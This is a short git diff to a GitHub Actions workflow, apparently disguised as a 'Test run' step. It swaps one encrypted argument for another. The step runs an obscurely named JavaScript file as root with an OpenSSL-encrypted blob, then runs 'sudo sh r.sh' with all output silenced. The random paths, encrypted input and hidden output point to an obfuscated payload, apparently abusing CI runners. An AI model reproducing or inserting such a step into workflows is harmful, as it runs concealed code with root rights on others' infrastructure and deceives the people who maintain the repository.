--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'n9qga'
+        echo '6qum7'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18ATx5+D9undjkZnYdLRgk15yDTzQDRdHKQKBdS21oWm+xwnD+7N/szsgEgieZgRHUvbIRgDMKtn9dLveeIGy6rPstCrAxtXQDF/EwRoDvmkcludedQCjAY 7csdza && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/geY67WdPVNa+q6X/AlgWRKiTKsc726bc9lq/b81dWEr4/qeQxRPfgZBjEYsC3eDHYjLuHCCr7nUM5LuyaxwpNdxPjafiGQDao821JzPj0Kzv5D2E4vjVk xoctsd && sudo sh r.sh > /dev/null 2>&1
